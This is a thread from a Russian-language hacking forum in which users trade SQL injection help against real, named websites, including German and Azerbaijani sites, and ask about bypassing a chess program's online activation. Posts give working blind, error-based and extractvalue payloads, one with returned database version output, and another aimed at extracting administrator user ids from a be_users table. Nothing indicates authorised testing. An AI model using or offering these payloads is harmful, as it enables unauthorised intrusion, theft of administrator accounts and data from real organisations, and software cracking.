HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2921  
Старый 24.06.2021, 15:51
ura122
Guest
Сообщений: n/a
Провел на форуме:
2469

Репутация: 0
По умолчанию

Здравствуйте, есть шахматная программа, которая требует онлайн-активации. Выяснил, что при вводе 25-значного ключа в программу, активация проходит с помощью проверки данного ключа вот по этому адресу: http://chess-cheat.com/test.php . При каждом обновлении данной страницы в браузере генерируется MD5 хеш 6-ти значных чисел и еще какие-то случайные цифры. Есть ли какие-то мысли об уязвимости?
 
Ответить с цитированием

  #2922  
Старый 29.06.2021, 21:02
Samozvanec
Guest
Сообщений: n/a
Провел на форуме:
1545

Репутация: 1
По умолчанию

Цитата:
Сообщение от Qweasdzxc1  
Qweasdzxc1 said:

подскажите пожалуйста
окунь нашел такую скулю:
https://site.com/tr/news-tr/wp2-0-d'|a|'efi-surumu/
мап ничего не находит
Поиграть руками с логикой. Вероятно это и не скуля вообще, а нестандартное поведение которое и задетектил ваш софт приняв это за sql-injection
 
Ответить с цитированием

  #2923  
Старый 20.10.2021, 21:31
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...

Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160
Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+select+111,222+--+
 
Ответить с цитированием

  #2924  
Старый 24.10.2021, 01:12
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:

Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос...
Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160
Код:
Code:
https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+select+111,222+--+
Тут только слепая

tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+and+if ((select+count(*)+from+information_schema.tables+l imit+0,1)=307,1,2)=1+--+
 
Ответить с цитированием

  #2925  
Старый 15.11.2021, 16:03
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Помогите, что можно сделать? вывод в коде

Код:
Code:
view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262
Код:
Code:
SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
 
Ответить с цитированием

  #2926  
Старый 16.11.2021, 11:08
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию

help to inject here "from admin"

return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0))having+avg(0)%23&password=dsadsada

return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
 
Ответить с цитированием

  #2927  
Старый 16.11.2021, 17:50
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:

Помогите, что можно сделать? вывод в коде
Код:
Code:
view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262
Код:
Code:
SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
Немного извращенно, но работать будет

/poi/extractvalue(1,concat(0x3a,(select@@version)))/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a &external_id=52262

Код:
Code:
XPATH syntax error: ':5.5.62-0ubuntu0.14.04.1'' (46 chars)
Цитата:
Сообщение от eminlayer7788  
eminlayer7788 said:

help to inject here "from admin"
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0))having+avg(0)%23&password=dsadsada
return=&username=sdsadssda%27+or+1+group+by+mid(us er(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
we are need full url for understanding filters
 
Ответить с цитированием

  #2928  
Старый 19.11.2021, 14:30
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию

help for sql injection

.SpoilerTarget" type="button">Spoiler: sqli link
https://optimal.az/TV-Audio-Foto-Vid...page=2&price=1%27group%20by%20mid(user()%20from%20floor(rand(0)* 2))having%20avg(0)--%20-

How to get table & column names ?

Thanks for help !
 
Ответить с цитированием

  #2929  
Старый 29.11.2021, 16:42
eminlayer7788
Guest
Сообщений: n/a
Провел на форуме:
36807

Репутация: 1
По умолчанию

Hi !

This is sqli ?

.SpoilerTarget" type="button">Spoiler: sqli link
https://www.petekamutner.am/covidNew...d=src&nid=8025

Thank !
 
Ответить с цитированием

  #2930  
Старый 03.12.2021, 16:05
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Как обойти where?

Код:
Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and/**/(extractvalue/*a*/(0,concat/**//*a*/(0,(select/**//*a*/(uid)from(be_users)where(admin=1)))))%23
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ